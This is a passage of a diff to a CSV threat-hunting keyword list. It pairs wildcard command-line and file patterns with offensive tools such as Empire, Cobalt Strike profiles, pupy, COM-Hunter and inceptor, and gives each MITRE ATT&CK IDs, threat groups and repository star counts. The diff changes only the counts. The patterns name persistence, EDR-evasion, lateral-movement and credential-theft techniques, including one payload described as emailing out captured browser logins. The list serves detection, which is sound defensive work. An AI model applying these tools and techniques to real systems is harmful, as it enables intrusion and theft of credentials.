tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -PE_Clone *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Persist General *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "* Persist Tasksch *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "* Persist TreatAs *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pi \\\\\\\\.\\\\pipe\\\\*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* -PipeName * -ServiceName * -Command whoami*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "* pipename_stager *","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* -pipename_stager *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" @@ -1523,38 +1523,38 @@ "* popcalc64.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* --port 1337*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 